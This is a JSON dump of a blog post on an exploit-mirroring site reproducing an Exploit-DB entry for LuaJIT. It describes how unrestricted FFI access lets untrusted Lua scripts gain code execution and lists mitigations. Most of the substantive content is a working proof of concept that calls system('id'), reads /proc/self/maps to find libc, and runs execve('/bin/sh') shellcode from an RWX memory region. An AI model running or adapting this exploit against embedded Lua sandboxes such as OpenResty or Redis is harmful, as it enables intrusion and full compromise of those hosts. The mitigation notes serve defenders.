{"id":52108,"date":"2026-05-07T10:34:43","date_gmt":"2026-05-07T10:34:43","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=52108"},"modified":"2026-05-07T10:34:43","modified_gmt":"2026-05-07T10:34:43","slug":"luajit-211774638290-arbitrary-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=52108","title":{"rendered":"LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution_EDB-ID:52554"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-07T15:27:58&#8243;,&#8221;description&#8221;:&#8221;&#8211; Exploit Title: LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution &#8212; Date: 2026-03-29 &#8212; Exploit Author: TaurusOmar &#8212; Vendor Homepage: https:\/\/luajit.org\/ &#8212; Software Link: https:\/\/luajit.org\/download.html &#8212; Version: LuaJIT 2.1.1774638290 latest &#8211;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-07T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-07T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52554&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8211; Exploit Title: LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution \\r\\n&#8211; Date: 2026-03-29\\r\\n&#8211; Exploit Author: TaurusOmar\\r\\n&#8211; Vendor Homepage: https:\/\/luajit.org\/\\r\\n&#8211; Software Link: https:\/\/luajit.org\/download.html\\r\\n&#8211; Version: LuaJIT 2.1.1774638290 (latest)\\r\\n&#8211; Tested on: Linux x86-64 (Arch Linux)\\r\\n\\r\\n\\r\\n&#8211; Description:\\r\\n&#8211; LuaJIT&#8217;s Foreign Function Interface (FFI) provides unrestricted access\\r\\n&#8211; to native C functions including syscall(), mmap(), mprotect() and \\r\\n&#8211; arbitrary shared library loading. When FFI is accessible to untrusted\\r\\n&#8211; Lua code in embedding scenarios (OpenResty, Redis, game engines, IoT),\\r\\n&#8211; an attacker can achieve arbitrary code execution with full process \\r\\n&#8211; privileges including shellcode execution via mmap(RWX)+ffi.copy()+ffi.cast().\\r\\n&#8211;\\r\\n&#8211; This affects any application embedding LuaJIT 2.1.x without explicitly\\r\\n&#8211; disabling FFI (-DLUAJIT_DISABLE_FFI) or removing it from the sandbox\\r\\n&#8211; environment before executing untrusted scripts.\\r\\n&#8211;\\r\\n&#8211; Verified on LuaJIT 2.1.1774638290 (March 2026) \u2014 latest version.\\r\\n&#8211;\\r\\n&#8211; Attack scenarios:\\r\\n&#8211;   &#8211; OpenResty\/Nginx with user-controlled Lua scripts\\r\\n&#8211;   &#8211; Redis with exposed EVAL interface\\r\\n&#8211;   &#8211; Game engines with Lua modding systems\\r\\n&#8211;   &#8211; IoT devices with Lua scripting interface\\r\\n&#8211;\\r\\n&#8211; Mitigation:\\r\\n&#8211;   &#8211; Compile with -DLUAJIT_DISABLE_FFI\\r\\n&#8211;   &#8211; Remove &#8216;ffi&#8217; from sandbox environment table\\r\\n&#8211;   &#8211; Apply OS-level restrictions: seccomp-bpf, AppArmor, namespaces\\r\\n\\r\\nlocal ffi = require(\\&#8221;ffi\\&#8221;)\\r\\nlocal bit = require(\\&#8221;bit\\&#8221;)\\r\\n\\r\\nffi.cdef[[\\r\\n    int      getpid(void);\\r\\n    long     syscall(long number, &#8230;);\\r\\n    int      system(const char *command);\\r\\n    void    *mmap(void *addr, size_t length, int prot,\\r\\n                  int flags, int fd, long offset);\\r\\n    int      munmap(void *addr, size_t length);\\r\\n]]\\r\\n\\r\\nprint(\\&#8221;=\\&#8221; .. string.rep(\\&#8221;=\\&#8221;, 55))\\r\\nprint(\\&#8221;  LuaJIT 2.1.x &#8211; FFI Unrestricted Syscall Access PoC\\&#8221;)\\r\\nprint(\\&#8221;=\\&#8221; .. string.rep(\\&#8221;=\\&#8221;, 55))\\r\\n\\r\\n&#8211; dlsym resolves libc symbols without restriction\\r\\nlocal pid_libc = ffi.C.getpid()\\r\\nprint(\\&#8221;\\\\n[1] ffi.C.getpid() via dlsym: \\&#8221; .. pid_libc)\\r\\n\\r\\n&#8211; Direct kernel syscall channel (SYS_getpid = 39 x86-64)\\r\\nlocal pid_sc = tonumber(ffi.C.syscall(39))\\r\\nprint(\\&#8221;[2] syscall(39) direct:       \\&#8221; .. pid_sc)\\r\\n\\r\\nif pid_libc == pid_sc then\\r\\n    print(\\&#8221;[+] Both channels confirmed active\\\\n\\&#8221;)\\r\\nend\\r\\n\\r\\n&#8211; ASLR bypass via \/proc\/self\/maps\\r\\nlocal f = io.open(\\&#8221;\/proc\/self\/maps\\&#8221;, \\&#8221;r\\&#8221;)\\r\\nfor line in f:lines() do\\r\\n    if line:find(\\&#8221;libc.so\\&#8221;) and line:find(\\&#8221;r&#8211;p\\&#8221;) then\\r\\n        local base = tonumber(\\&#8221;0x\\&#8221; .. line:match(\\&#8221;^(%x+)\\&#8221;))\\r\\n        print(\\&#8221;[3] libc base (ASLR bypass): 0x\\&#8221; .. string.format(\\&#8221;%x\\&#8221;, base))\\r\\n        break\\r\\n    end\\r\\nend\\r\\nf:close()\\r\\n\\r\\n&#8211; Arbitrary command execution\\r\\nprint(\\&#8221;[4] ffi.C.system(&#8216;id&#8217;):\\&#8221;)\\r\\nffi.C.system(\\&#8221;id\\&#8221;)\\r\\n\\r\\n&#8211; Shellcode execution via mmap(RWX)\\r\\nprint(\\&#8221;\\\\n[5] Shellcode execution via mmap(RWX):\\&#8221;)\\r\\nlocal PROT_RWX  = bit.bor(1, 2, 4)\\r\\nlocal MAP_FLAGS = bit.bor(0x02, 0x20)\\r\\n\\r\\n&#8211; x86-64 execve(\\&#8221;\/bin\/sh\\&#8221;, NULL, NULL) &#8211; syscall 59\\r\\nlocal shellcode =\\r\\n    \\&#8221;\\\\x48\\\\x31\\\\xd2\\&#8221;\\r\\n    .. \\&#8221;\\\\x48\\\\xbb\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x00\\&#8221;\\r\\n    .. \\&#8221;\\\\x53\\&#8221;\\r\\n    .. \\&#8221;\\\\x48\\\\x89\\\\xe7\\&#8221;\\r\\n    .. \\&#8221;\\\\x48\\\\x31\\\\xf6\\&#8221;\\r\\n    .. \\&#8221;\\\\x48\\\\x31\\\\xc0\\&#8221;\\r\\n    .. \\&#8221;\\\\xb0\\\\x3b\\&#8221;\\r\\n    .. \\&#8221;\\\\x0f\\\\x05\\&#8221;\\r\\n\\r\\nlocal mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_FLAGS, -1, 0)\\r\\nif ffi.cast(\\&#8221;long\\&#8221;, mem) ~= -1 then\\r\\n    print(\\&#8221;    RWX region: 0x\\&#8221; .. string.format(\\&#8221;%x\\&#8221;, ffi.cast(\\&#8221;unsigned long\\&#8221;, mem)))\\r\\n    ffi.copy(mem, shellcode, #shellcode)\\r\\n    print(\\&#8221;    Shellcode written. Executing execve(&#8216;\/bin\/sh&#8217;)&#8230;\\&#8221;)\\r\\n    local fn = ffi.cast(\\&#8221;void(*)(void)\\&#8221;, mem)\\r\\n    fn()\\r\\nend&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52554&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52554&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-07T15:27:58&#8243;,&#8221;description&#8221;:&#8221;&#8211; Exploit Title: LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution &#8212; Date: 2026-03-29 &#8212; Exploit Author: TaurusOmar &#8212; Vendor Homepage: https:\/\/luajit.org\/ &#8212; Software Link: https:\/\/luajit.org\/download.html &#8212;&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-52108","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=52108\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-07T15:27:58&#8243;,&#8221;description&#8221;:&#8221;&#8211; Exploit Title: LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution &#8212; Date: 2026-03-29 &#8212; Exploit Author: TaurusOmar &#8212; Vendor Homepage: https:\/\/luajit.org\/ &#8212; Software Link: https:\/\/luajit.org\/download.html &#8212;...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=52108\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-07T10:34:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution_EDB-ID:52554\",\"datePublished\":\"2026-05-07T10:34:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108\"},\"wordCount\":786,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52108#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108\",\"name\":\"LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-07T10:34:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52108\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52108#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution_EDB-ID:52554\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=52108","og_locale":"en_US","og_type":"article","og_title":"LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-07T15:27:58&#8243;,&#8221;description&#8221;:&#8221;&#8211; Exploit Title: LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution &#8212; Date: 2026-03-29 &#8212; Exploit Author: TaurusOmar &#8212; Vendor Homepage: https:\/\/luajit.org\/ &#8212; Software Link: https:\/\/luajit.org\/download.html &#8212;...","og_url":"https:\/\/zero.redgem.net\/?p=52108","og_site_name":"zero redgem","article_published_time":"2026-05-07T10:34:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=52108#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=52108"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution_EDB-ID:52554","datePublished":"2026-05-07T10:34:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=52108"},"wordCount":786,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=52108#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=52108","url":"https:\/\/zero.redgem.net\/?p=52108","name":"LuaJIT 2.1.1774638290 - Arbitrary Code Execution_EDB-ID:52554 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-07T10:34:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=52108#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=52108"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=52108#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"LuaJIT 2.1.1774638290 &#8211; Arbitrary Code Execution_EDB-ID:52554"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=52108"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52108\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=52108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=52108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=52108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}